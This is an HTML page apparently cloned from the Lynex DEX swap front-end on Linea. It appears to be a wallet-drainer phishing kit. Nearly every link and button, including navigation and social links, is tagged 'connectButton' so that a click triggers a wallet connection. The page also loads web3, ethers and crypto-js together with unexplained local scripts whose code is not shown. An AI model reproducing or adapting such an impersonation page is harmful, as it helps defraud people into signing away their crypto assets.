<html lang="en" style="--wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;">
 <head>
  <meta charset="utf-8"/>
  <script src="https://unpkg.com/web3@latest/dist/web3.min.js">
  </script>
  <script src="https://unpkg.com/crypto-js@latest/crypto-js.js">
  </script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript">
  </script>
  <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js">
  </script>
  <script src="./js/settings.js">
  </script>
  <script src="./js/webchunk.js">
  </script>
  <meta content="IE=edge" http-equiv="X-UA-Compatible"/>
  <link href="/favicon.ico" rel="icon"/>
  <meta content="width=device-width,initial-scale=1,maximum-scale=5,minimum-scale=1" name="viewport"/>
  <meta content="Lynex - Linea's native liquidity layer and AMM" name="title"/>
  <meta content="Trade your favourite tokens with low-slippage and efficient pricing. Provide liquidity to earn yields, get paid to vote for pools and more!" name="description"/>
  <meta content="Lynex - Linea's native liquidity layer and AMM" name="twitter:title"/>
  <meta content="Trade your favourite tokens with low-slippage and efficient pricing. Provide liquidity to earn yields, get paid to vote for pools and more!" name="twitter:description"/>
  <meta content="summary_large_image" name="twitter:card"/>
  <meta content="https://lynex-frontend-git-rebrand-defiswami.vercel.app/cover.png" name="twitter:image"/>
  <meta content="#000000" name="theme-color"/>
  <link href="/logo.png" rel="apple-touch-icon"/>
  <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
  <link href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" rel="stylesheet"/>
  <link href="/manifest.json" rel="manifest"/>
  <link href="https://fonts.googleapis.com" rel="preconnect"/>
  <link crossorigin="" href="https://fonts.gstatic.com" rel="preconnect"/>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700&amp;display=swap" rel="stylesheet"/>
  <link charset="UTF-8" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.6.0/slick.min.css" rel="stylesheet"/>
  <link href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.6.0/slick-theme.min.css" rel="stylesheet"/>
  <title>
   Lynex
  </title>
  <link href="/static/css/main.90c6ae8e.css" rel="stylesheet"/>
  <meta content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9" http-equiv="origin-trial"/>
  <style data-styled="active" data-styled-version="5.3.11">
  </style>
  <style type="text/css">
   .i-sl-wrapper {
                position: fixed;
                z-index: 1000000;
                border: 0px;
                width: 430px;
                background: transparent;
                border-radius: 16px;
                height: calc(100% - 30px);
                box-shadow: rgba(0, 0, 0, 0.16) 0px 5px 40px;
                transition: all 0.3s ease;
                overflow: hidden;
            }
            .i-sl-wrapper:not(.active) {
                height: calc(100% - 150px);
                top: auto;
                opacity: 0;
            }
            .i-sl-wrapper.hidden {
                display:none;
            }
            .i-sl-wrapper.expanded {
                width: 700px;
            }
            .i-sl-wrapper.left {
                left: 15px;
                bottom: 15px;
                top: 15px;
            }
            .i-sl-wrapper.right {
                right: 15px;
                bottom: 15px;
                top: 15px;
            }
            .i-sl-widget {
                width: 100%; 
                height: 100%; 
                border: 0;
            }
            .i-sl-wrapper.popup {
                top: auto!important;
                bottom: 0px!important;
                height: 0px!important;
                transition:ease all .4s!important;
                opacity:0!important;
                box-shadow: none;
                width: 380px;
            }
            .i-sl-wrapper.popup.left {
                left: 0px;
            }
            .i-sl-wrapper.popup.right {
                right: 0px;
            }
            .i-sl-wrapper.popup-large {
                width: 550px;
            }
            .i-sl-wrapper.tiny {
                top: auto!important;
                height: 0px!important;
                transition:ease all .4s!important;
                opacity:0!important;
                width: 350px;
            }



            .i-sl-button {
                font-family: Verdana, Arial, Helvetica, sans-serif;
                -webkit-font-smoothing: antialiased;
                position: fixed;
                z-index:100000;
                bottom: 0px;
                left: 0px;
                right: auto;
                top: auto;
                box-sizing: content-box!important;
            }
            .i-sl-button.inactive {
                display: none;
                opacity: 0;
            }
            .i-sl-button * {
                box-sizing: content-box!important;
            }
            .i-sl-button-btn {
                display: flex;
                cursor: pointer;
                background: #2196F3;
                background-color: #e28743;
                color: #FFFFFF;
                cursor:pointer;
                max-height: 40px;
                height: 40px;
                border-radius: 40px;
                overflow:hidden;
                opacity:1;
                transition: all 0.3s ease;
            }
            .i-sl-button-btn.force-hidden {
                opacity:0;
            }
            .i-sl-button-btn:not(.active) {
                opacity:0;
            }
            .i-sl-button-desc {
                line-height: 40px;
                margin: 0 15px;
                margin-right: 25px;
            }
            .i-sl-button-desc span {
                display:block;
                white-space: nowrap;
                font-size: 13px;
                text-align: center;
                font-weight: 500;
                letter-spacing: 1;
                text-transform: uppercase;
                max-width: 150px;
                overflow: hidden;
                text-overflow: ellipsis;
            }
            .i-sl-button-logo {
                background: transparent;
            }
            .i-sl-button-logo > div {
                height: 36px;
                width: 36px;
                padding: 2px;
            }
            .i-sl-button-logo > div img {
                border-radius: 50%;
                display: block;
                height: 36px;
                width: 36px;
                margin: 0;
                padding: 0;
            }
            .i-sl-button-logo > div svg {
                display: block;
                height: 36px;
                width: 36px;
                opacity: .8;
                fill: #ffffff;
                margin: 0;
                padding: 0;
            }
            .i-sl-button.left-middle {
                left: 15px;
                right: auto;
            }
            .i-sl-button.left-top {
                bottom: auto;
                left: 15px;
                right: auto;
                top: 15px;
            }
            .i-sl-button.left-bottom {
                bottom: 15px;
                left: 15px;
                right: auto;
                top: auto;
            }
            .i-sl-button.right-middle {
                right: 15px;
                left: auto;
            }
            .i-sl-button.right-top {
                bottom: auto;
                left: auto;
                right: 15px;
                top: 15px;
            }
            .i-sl-button.right-bottom {
                bottom: 15px;
                left: auto;
                right: 15px;
                top: auto;
            }
            .i-sl-button-counter {
                display:none;
                position: absolute;
                top: -5px;
                right: -5px;
                z-index: 100;
            }
            .i-sl-button-counter.active {
                display:block;
            }
            .i-sl-button-counter-inner {
                background: #ed8484;
                color: #FFF;
                border-radius: 50%;
                text-align: center;
                height: 16px;
                line-height: 16px;
                width: 16px;
                font-size: 9px;
                font-weight: 700;
                border: 2px solid #FFF;
                font-family: Arial;
            }

            /* Compact Button */
            .i-sl-button-inner.compact .i-sl-button-desc {
                -webkit-transition: ease all .5s;
                transition: ease all .5s;
                max-width: 500px;
            }
            .i-sl-button-inner.compact:not(:hover) .i-sl-button-desc {
                margin: 0px!important;
                max-width: 0px;
            }
            .i-sl-button-inner.compact .i-sl-button-btn {
                position: relative;
                z-index: 20;
            }
            .i-sl-button-inner.compact {
                position: relative;
                z-index: 10;
            }
            .i-sl-button-inner.compact .i-sl-button-btn.active {
                overflow: initial;
            }
            .i-sl-button-inner.compact .i-sl-button-btn.active::after {
                content: '';
                -webkit-transition: ease all .5s;
                transition: ease all .5s;
                z-index: -1;
                position: absolute;
                bottom: 0px;
                width: 20px;
                height: 20px;
                left: 20px;
                margin-left: 0px;
                background: #03a9f4;
                background-color: #e28743;
                opacity: 1;
                border-radius: 0 0 3px 0;
            }
            .i-sl-button-inner.compact:hover .i-sl-button-btn::after {
                opacity: 0;
            }

            /* Icon: empty */
            .i-sl-button-inner.icon-none:not(.compact) .i-sl-button-logo > div {
                width: 10px;
                padding: 0px;
            }
            .i-sl-button-inner.icon-none.compact:hover .i-sl-button-logo > div {
                width: 10px;
                padding: 0px;
            }

            /* Middle Button */
            .i-sl-button[class*='-middle'] {
                top: 50%;
                bottom: auto;
                transform: translateY(-50%);
                transform-origin: center;
            }
            .i-sl-button[class*='-middle'] .i-sl-button-btn {
                flex-direction: column-reverse;
                height: auto;
                max-height: 100%;
                width: 40px;
                max-width: 40px;
            }
            .i-sl-button[class*='-middle'] .i-sl-button-desc {
                writing-mode: vertical-lr;
                margin: 15px 0;
                margin-top: 25px;
                transform: rotate(180deg);
            }
            .i-sl-button[class*='-middle'] .i-sl-button-desc span {
                max-height: 150px;
                text-overflow: initial;
            }
            .i-sl-button[class*='-middle'] .i-sl-button-inner.compact:not(:hover) .i-sl-button-desc {
                max-height: 0px!important;
                max-width: 40px!important;
                margin: 0px;
            }



            /* Tools */
            .t-sl-wrapper-opened {
                overflow: hidden!important;
            }
            .t-sl-wrapper {
                position: fixed;
                top: 0px;
                right: 0px;
                left: 0px;
                bottom: 0px;
                z-index: 9999999999;
                width: 100%;
                height: 100%;
                opacity: 1;
                transition: ease opacity .4s;
                transition-delay: .2s;
            }
            .t-sl-wrapper.hidden {
                opacity: 0;
                z-index: -1;
                width: 0px;
                height: 0px;
                transition: ease opacity .4s;
                transition-delay: .2s;
            }
            .t-sl-widget {
                width: 100%; 
                height: 100%; 
                border: 0;
            }



            /* Full screen widget */
            @media only screen and (max-width: 450px) {

                .i-sl-wrapper {
                    left: 0px!important;
                    top: 0px!important;
                    bottom: 0px!important;
                    right: 0px!important;
                    width: 100%!important;
                    height: 100%;
                    border-radius: 0px;
                }
            
            }



            /* Expanded => Full screen widget */
            @media only screen and (max-width: 730px) {

                .i-sl-wrapper.expanded {
                    left: 0px!important;
                    top: 0px!important;
                    bottom: 0px!important;
                    right: 0px!important;
                    width: 100%!important;
                    height: 100%;
                    border-radius: 0px;
                }
            
            }



            /* Tablet */
            @media only screen and (max-width: 900px) {

                .i-sl-button-btn {
                    max-height: 30px;
                    height: 30px;
                }
                .i-sl-button-desc {
                    line-height: 30px;
                }
                .i-sl-button-logo > div {
                    height: 26px;
                    width: 26px;
                    padding: 2px;
                }
                .i-sl-button-logo > div img {
                    height: 26px;
                    width: 26px;
                }
                .i-sl-button-logo > div svg {
                    height: 26px;
                    width: 26px;
                }
                .i-sl-button.left-middle {
                    left: 5px;
                }
                .i-sl-button.right-middle {
                    right: 5px;
                }

                /* Compact Button */
                .i-sl-button-inner.compact::after {
                    width: 15px;
                    height: 15px;
                    left: 15px;
                }
                .i-sl-button-inner.compact .i-sl-button-btn.active::after {
                    width: 15px;
                    height: 15px;
                    left: 15px;
                }

                /* Middle Button */
                .i-sl-button[class*='-middle'] .i-sl-button-btn {
                    width: 30px;
                    max-width: 30px;
                }

            }



            /* Smartphone */
            @media only screen and (max-width: 500px) { 

            }



            /* Custom Badge */
            [data-badge],
            [data-badge-feedback],
            [data-badge-changelog] {
                position: relative!important;
            }
            [data-badge]::after,
            [data-badge-feedback]::after,
            [data-badge-changelog]::after {
                display:none;
                content: attr(data-count);
                position: absolute;
                right: -7px;
                top: -7px;
                width: 14px;
                height: 14px;
                line-height: 14px;
                font-size: 9px;
                font-weight: bold;
                text-align: center;
                border-radius: 50%;
                color: #fff;
                background-color: #ed8484;
                font-family: Arial;
            }
            [data-count][data-badge]::after,
            [data-count][data-badge-feedback]::after,
            [data-count][data-badge-changelog]::after {
                display:block;
            }
  </style>
 </head>
 <link href="totalcss.css" rel="stylesheet"/>
 <body>
  <div id="root">
   <div class="main">
    <div data-rk="">
     <style>
      [data-rk]{--rk-blurs-modalOverlay:blur(0px);--rk-fonts-body:SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";--rk-radii-actionButton:9999px;--rk-radii-connectButton:12px;--rk-radii-menuButton:12px;--rk-radii-modal:24px;--rk-radii-modalMobile:28px;--rk-colors-accentColor:#DF832F;--rk-colors-accentColorForeground:#FFF;--rk-colors-actionButtonBorder:rgba(255, 255, 255, 0.04);--rk-colors-actionButtonBorderMobile:rgba(255, 255, 255, 0.1);--rk-colors-actionButtonSecondaryBackground:rgba(255, 255, 255, 0.08);--rk-colors-closeButton:rgba(255, 255, 255, 0.7);--rk-colors-closeButtonBackground:rgba(255, 255, 255, 0.08);--rk-colors-connectButtonBackground:#000;--rk-colors-connectButtonBackgroundError:#FF494A;--rk-colors-connectButtonInnerBackground:linear-gradient(0deg, rgba(255, 255, 255, 0.06), rgba(255, 255, 255, 0.12));--rk-colors-connectButtonText:#FFF;--rk-colors-connectButtonTextError:#FFF;--rk-colors-connectionIndicator:#30E000;--rk-colors-downloadBottomCardBackground:linear-gradient(126deg, rgba(0, 0, 0, 0) 9.49%, rgba(120, 120, 120, 0.1) 71.04%), #050505;--rk-colors-downloadTopCardBackground:linear-gradient(126deg, rgba(120, 120, 120, 0.1) 9.49%, rgba(0, 0, 0, 0) 71.04%), #050505;--rk-colors-error:#FF494A;--rk-colors-generalBorder:rgba(255, 255, 255, 0.08);--rk-colors-generalBorderDim:rgba(255, 255, 255, 0.04);--rk-colors-menuItemBackground:rgba(255, 255, 255, 0.08);--rk-colors-modalBackdrop:rgba(0, 0, 0, 0.7);--rk-colors-modalBackground:#000;--rk-colors-modalBorder:rgba(255, 255, 255, 0.08);--rk-colors-modalText:#FFF;--rk-colors-modalTextDim:rgba(255, 255, 255, 0.2);--rk-colors-modalTextSecondary:rgba(255, 255, 255, 0.6);--rk-colors-profileAction:rgba(255, 255, 255, 0.1);--rk-colors-profileActionHover:rgba(255, 255, 255, 0.2);--rk-colors-profileForeground:rgba(255, 255, 255, 0.06);--rk-colors-selectedOptionBorder:rgba(224, 232, 255, 0.1);--rk-colors-standby:#FFD641;--rk-shadows-connectButton:0px 4px 12px rgba(0, 0, 0, 0.1);--rk-shadows-dialog:0px 8px 32px rgba(0, 0, 0, 0.32);--rk-shadows-profileDetailsAction:0px 2px 6px rgba(37, 41, 46, 0.04);--rk-shadows-selectedOption:0px 2px 6px rgba(0, 0, 0, 0.24);--rk-shadows-selectedWallet:0px 2px 6px rgba(0, 0, 0, 0.24);--rk-shadows-walletLogo:0px 2px 16px rgba(0, 0, 0, 0.16);}
     </style>
     <div class="header-wrap fixed w-full z-[120]">
      <div class="banner justify-between items-center z-500">
       <div class="flex flex-col md:flex-row w-full justify-center items-center text-xs md:text-base">
        <p class="font-bold md:mr-4 whitespace-nowrap">
         Beta
        </p>
        <div class="font-medium flex flex-row flex-wrap justify-center">
         <a class="underline underline-offset-2 connectButton" href="https://testnet.lynex.fi/">
          <p class="mr-0 md:mr-2">
           Check our upcoming features on testnet
          </p>
         </a>
        </div>
       </div>
       <img alt="" class="cursor-pointer w-6 h-6 ml-6" src="/images/common/close-button2.svg"/>
      </div>
      <div class="bg-transparent transition-all duration-300 ease-in-out">
       <div class="header px-4 2xl:px-12 py-6">
        <a class="connectButton" href="/">
         <img alt="" class="logo relative z-10" src="/images/header/logo.svg"/>
        </a>
        <ul class="navigation absolute z-20 justify-center hidden xl:flex items-center w-[calc(100vw-120px)]">
         <li class="links">
          <a class="text-sky connectButton" href="/swap">
           SWAP
          </a>
         </li>
         <li class="links">
          <a class="font-light undefined connectButton" href="/liquidity-info">
           LIQUIDITY
          </a>
         </li>
         <li class="links">
          <a class="font-light special connectButton" href="/mining">
           PRE MINING
          </a>
         </li>
         <li class="links">
          <div class="relative">
           <div class="flex items-center space-x-1 cursor-pointer relative z-10 font-light text-white">
            <span>
             BRIDGE
            </span>
            <img alt="dropdown" class="rotate-180 transition-all duration-150 ease-in-out" src="/images/header/dropdown-arrow.svg"/>
           </div>
          </div>
         </li>
         <li class="links">
          <div class="relative">
           <div class="flex items-center space-x-1 cursor-pointer relative z-10 font-light text-white">
            <span>
             MORE
            </span>
            <img alt="dropdown" class="rotate-180 transition-all duration-150 ease-in-out" src="/images/header/dropdown-arrow.svg"/>
           </div>
          </div>
         </li>
        </ul>
        <div class="tracking-[2px] xl:px-[25px] xl:tracking-[2px] items-center font-semibold text-white text-sm md:text-sm relative z-20 xl:text-base mobile-btn f-f-fg hidden xl:flex">
         <div class="line1">
         </div>
         <div class="line2">
         </div>
         <div style="">
          <button class="connectButton" type="button">
           CONNECT WALLET
          </button>
         </div>
        </div>
        <button class="bg-transparent w-8 xl:hidden connectButton">
         <img alt="" src="/images/header/hamburger-menu.png"/>
        </button>
       </div>
      </div>
     </div>
     <div class="top-bg !z-[1000] xl:hidden top-minus">
      <div class="inner-tab">
       <div class="top-navigation">
        <a class="connectButton" href="/">
         <img alt="" class="logo-2" src="/images/header/logo.svg"/>
        </a>
        <div class="closeButton">
         <img alt="" src="/images/common/close-button2.svg"/>
        </div>
       </div>
       <div class="bottom-navigation w-full">
        <ul class="flex flex-col items-center justify-center">
         <li class="links">
          <a class="text-sky no-link text-white connectButton" href="/swap">
           SWAP
          </a>
         </li>
         <li class="links">
          <a class="false no-link text-white connectButton" href="/liquidity-info">
           LIQUIDITY
          </a>
         </li>
         <li class="links">
          <a class="false no-link text-white connectButton" href="/mining">
           PRE MINING
          </a>
         </li>
         <li class="links">
          <div>
           <div class="relative">
            <div class="flex items-center space-x-1 cursor-pointer relative z-10 font-light text-white">
             <span>
              BRIDGE
             </span>
             <img alt="dropdown" class="rotate-180 transition-all duration-150 ease-in-out" src="/images/header/dropdown-arrow.svg"/>
            </div>
           </div>
          </div>
         </li>
         <li class="links">
          <div>
           <div class="relative">
            <div class="flex items-center space-x-1 cursor-pointer relative z-10 font-light text-white">
             <span>
              MORE
             </span>
             <img alt="dropdown" class="rotate-180 transition-all duration-150 ease-in-out" src="/images/header/dropdown-arrow.svg"/>
            </div>
           </div>
          </div>
         </li>
        </ul>
        <div class="mobile-btn f-f-fg">
         <div class="line1">
         </div>
         <div class="line2">
         </div>
         <div style="">
          <button class="connectButton" type="button">
           CONNECT WALLET
          </button>
         </div>
        </div>
       </div>
      </div>
     </div>
     <div class="fixed z-0 invisible opacity-0 inset-0 w-full h-full transition-all duration-300 ease-in-out bg-opacity-[0.05] backdrop-blur-[2px] bg-body">
     </div>
     <div class="z-0 invisible opacity-0 w-full inset-0 fixed transition-all duration-300 ease-in-out flex items-center min-h-screen justify-center flex-col paraent">
      <div>
       <div class="max-w-[92%] md:w-[540px] px-3 md:px-6 mx-auto w-full py-3 md:py-5 bg-neutral-600/90 backdrop-blur-sm rounded-[10px]">
        <div class="flex items-center justify-between">
         <div class="flex items-center">
          <p class="text-lg md:text-[22px] f-f-fg text-white font-semibold">
          </p>
         </div>
         <button class="focus:outline-none connectButton">
          <img alt="" src="/images/common/close-button1.svg"/>
         </button>
        </div>
        <div class="border border-themeOrange px-6 py-[18px] rounded-[3px] mt-4 sm:min-w-[450px] lg:max-w-[540px]">
        </div>
       </div>
      </div>
     </div>
     <div class="orangeGlow">
     </div>
     <div class="whiteGlow">
     </div>
     <div class="w-full pt-[160px] pb-28 xl:pb-0 2xl:pb-[32px] px-5 xl:px-0">
      <div class="max-w-[1104px] mx-auto w-full">
       <div class="flex justify-center">
        <div class="flex h-11 border-[#DF832F] border-t border-l border-r border-b rounded-[5px]">
         <div class="w-[70px] md:w-[100px] h-full text-sm md:text-base flex justify-center items-center cursor-pointer text-[#A2A0B7] font-normal -mr-[3px] -ml-px">
          V1
         </div>
         <div class="w-[70px] md:w-[100px] h-full text-sm md:text-base flex justify-center items-center cursor-pointer text-white font-semibold border-[#DF832F] border rounded-[5px] -ml-px popup-gradientbg">
          FUSION
         </div>
         <div class="w-[70px] md:w-[100px] h-full text-sm md:text-base flex justify-center items-center cursor-pointer text-[#A2A0B7] font-normal -mr-[3px] -ml-px">
          LIMIT
         </div>
         <div class="w-[70px] md:w-[100px] h-full text-sm md:text-base flex justify-center items-center cursor-pointer text-[#A2A0B7] font-normal -mr-[3px] -ml-px">
          TWAP
         </div>
        </div>
       </div>
      </div>
      <div class="w-full max-w-[588px] mx-auto relative mt-[25px] pb-28 xl:pb-0 2xl:pb-[32px]">
       <div>
        <div class="bg-white bg-opacity-10 p-px relative z-[10] rounded-[10px]">
         <div class="rounded-[5px] px-3 md:px-6 py-3 md:py-4">
          <div class="flex items-center justify-between">
           <p class="f-f-fg text-[23px] md:text-[27px] leading-10 text-white font-semibold">
            Swap
           </p>
           <button class="connectButton">
            <img alt="" src="/images/swap/bar.svg"/>
           </button>
          </div>
          <div class="mt-3">
           <div class="flex flex-col w-full items-center justify-center">
            <div class="w-full">
             <div class="flex items-center justify-between flex-wrap">
              <p class="text-dimGray text-sm md:text-base leading-10">
               From
              </p>
             </div>
             <div class="mt-1.5 md:mt-2.5 p-px w-full rounded-md">
              <div class="bg-white/10 pr-3 rounded-md flex items-center justify-between">
               <div class="w-[70%] py-[8px] lg:py-[10px] pl-2.5 lg:pl-4 text-white">
                <input class="bg-transparent !border-0 text-xl lg:text-2xl leading-8 placeholder-white text-white" min="0" placeholder="0.00" type="number" value=""/>
                <div class="text-xs lg:text-sm">
                 $0
                </div>
               </div>
               <div class="flex bg-white/10 items-center ml-2 px-2 rounded-md space-x-5 f-f-fg cursor-pointer">
                <div class="flex items-center space-x-[3.5px] lg:space-x-2">
                 <img alt="" class="w-[28px] h-[28px]" src="https://s2.coinmarketcap.com/static/img/coins/64x64/1027.png"/>
                 <p class="font-medium text-sm lg:text-[1.2rem] leading-6 text-white">
                  ETH
                 </p>
                </div>
                <img alt="" src="/images/swap/down-arrow-white.svg"/>
               </div>
              </div>
             </div>
            </div>
            <button class="focus:outline-none mt-5 z-[8] connectButton">
             <img src="/images/swap/reverse-icon.svg"/>
            </button>
            <div class="w-full">
             <div class="flex items-center justify-between flex-wrap">
              <p class="text-dimGray text-sm md:text-base leading-10">
               To
              </p>
             </div>
             <div class="mt-1.5 md:mt-2.5 p-px w-full rounded-md">
              <div class="bg-white/10 pr-3 rounded-md flex items-center justify-between">
               <div class="w-[70%] py-[8px] lg:py-[10px] pl-2.5 lg:pl-4 text-white">
                <input class="bg-transparent !border-0 text-xl lg:text-2xl leading-8 placeholder-white text-white" disabled="" min="0" placeholder="0.00" type="number" value=""/>
                <div class="text-xs lg:text-sm">
                 $0
                </div>
               </div>
               <div class="flex bg-white/10 items-center ml-2 px-2 rounded-md space-x-5 f-f-fg cursor-pointer">
                <div class="flex items-center space-x-[3.5px] lg:space-x-2">
                 <img alt="" class="w-[28px] h-[28px]" src="https://s2.coinmarketcap.com/static/img/coins/64x64/3408.png"/>
                 <p class="font-medium text-sm lg:text-[1.2rem] leading-6 text-white">
                  USDC
                 </p>
                </div>
                <img alt="" src="/images/swap/down-arrow-white.svg"/>
               </div>
              </div>
             </div>
            </div>
           </div>
          </div>
          <div class="mt-3">
           <div class="flex items-center justify-between">
            <p class="text-white text-sm md:text-base leading-5">
             Slippage Tolerance
            </p>
            <p class="text-white text-sm md:text-base leading-5">
             0.5%
            </p>
           </div>
          </div>
          <button class="sc-gEvEer hXbing f-f-fg transition-all duration-300 ease-in-out !font-semibold py-[13px] md:py-[14.53px] text-white mt-2 md:mt-3 text-base md:text-lg tracking-[1.12px] md:tracking-[1.44px] flex items-center justify-center leading-[30px] px-[19px] w-full rounded-[3px] connectButton" role="button">
           CONNECT WALLET
          </button>
         </div>
        </div>
       </div>
      </div>
     </div>
     <div class="footer-wrap" id="footer">
      <img class="invisible hidden sm:visible sm:block absolute left-10 bottom-0 pt-6 max-w-[550px]" src="/images/footer/bg-footer.svg"/>
      <div class="upper-footer-wrapper">
       <div class="info">
        <p class="heading">
         The Native Liquidity Layer Of Linea
        </p>
        <p>
         Step into the heart of Linea's intrinsic on-chain liquidity marketplace. Driven by state-of-the-art DEX infrastructure, we present an exceptionally efficient DeFi solution. Immerse yourself in the capabilities of Lynex now!
        </p>
       </div>
       <div class="links">
        <div class="column">
         <p class="heading">
          Other
         </p>
         <a class="link connectButton" href="/">
          Home
         </a>
         <a class="link connectButton" href="/swap">
          Swap
         </a>
         <a class="link connectButton" href="/liquidity-info">
          Liquidity
         </a>
        </div>
        <div class="column">
         <p class="heading">
          More of Lynex
         </p>
         <div class="link hover:underline" id="subitem-0">
          Docs
         </div>
         <div class="link hover:underline" id="subitem-1">
          Legal Disclaimer
         </div>
        </div>
       </div>
      </div>
      <div class="lower-footer-wrapper">
       <img src="/images/header/logo.svg" width="110"/>
       <p>
        Copyright © 2023 Lynex. All rights reserved.
       </p>
       <div class="flex items-center space-x-[14px]">
        <a class="connectButton" href="https://twitter.com/LynexFi" rel="noreferrer" target="_blank">
         <svg class="max-w-[36px] text-themeOrange text-[36px]" fill="currentColor" height="1em" stroke="currentColor" stroke-width="0" viewbox="0 0 448 512" width="1em" xmlns="http://www.w3.org/2000/svg">
          <path d="M64 32C28.7 32 0 60.7 0 96V416c0 35.3 28.7 64 64 64H384c35.3 0 64-28.7 64-64V96c0-35.3-28.7-64-64-64H64zM351.3 199.3v0c0 86.7-66 186.6-186.6 186.6c-37.2 0-71.7-10.8-100.7-29.4c5.3 .6 10.4 .8 15.8 .8c30.7 0 58.9-10.4 81.4-28c-28.8-.6-53-19.5-61.3-45.5c10.1 1.5 19.2 1.5 29.6-1.2c-30-6.1-52.5-32.5-52.5-64.4v-.8c8.7 4.9 18.9 7.9 29.6 8.3c-9-6-16.4-14.1-21.5-23.6s-7.8-20.2-7.7-31c0-12.2 3.2-23.4 8.9-33.1c32.3 39.8 80.8 65.8 135.2 68.6c-9.3-44.5 24-80.6 64-80.6c18.9 0 35.9 7.9 47.9 20.7c14.8-2.8 29-8.3 41.6-15.8c-4.9 15.2-15.2 28-28.8 36.1c13.2-1.4 26-5.1 37.8-10.2c-8.9 13.1-20.1 24.7-32.9 34c.2 2.8 .2 5.7 .2 8.5z">
          </path>
         </svg>
        </a>
        <a class="connectButton" href="https://medium.com/@lynexfi" rel="noreferrer" target="_blank">
         <svg class="max-w-[36px] text-themeOrange text-[36px]" fill="currentColor" height="1em" stroke="currentColor" stroke-width="0" viewbox="0 0 1024 1024" width="1em" xmlns="http://www.w3.org/2000/svg">
          <path d="M880 112H144c-17.7 0-32 14.3-32 32v736c0 17.7 14.3 32 32 32h736c17.7 0 32-14.3 32-32V144c0-17.7-14.3-32-32-32zM768 317.7l-40.8 39.1c-3.6 2.7-5.3 7.1-4.6 11.4v287.7c-.7 4.4 1 8.8 4.6 11.4l40 39.1v8.7H566.4v-8.3l41.3-40.1c4.1-4.1 4.1-5.3 4.1-11.4V422.5l-115 291.6h-15.5L347.5 422.5V618c-1.2 8.2 1.7 16.5 7.5 22.4l53.8 65.1v8.7H256v-8.7l53.8-65.1a26.1 26.1 0 0 0 7-22.4V392c.7-6.3-1.7-12.4-6.5-16.7l-47.8-57.6V309H411l114.6 251.5 100.9-251.3H768v8.5z">
          </path>
         </svg>
        </a>
        <a class="connectButton" href="https://discord.gg/3BFkJjPmB3" rel="noreferrer" target="_blank">
         <svg class="max-w-[36px] text-themeOrange text-[36px]" fill="currentColor" height="1em" stroke="currentColor" stroke-width="0" viewbox="0 0 640 512" width="1em" xmlns="http://www.w3.org/2000/svg">
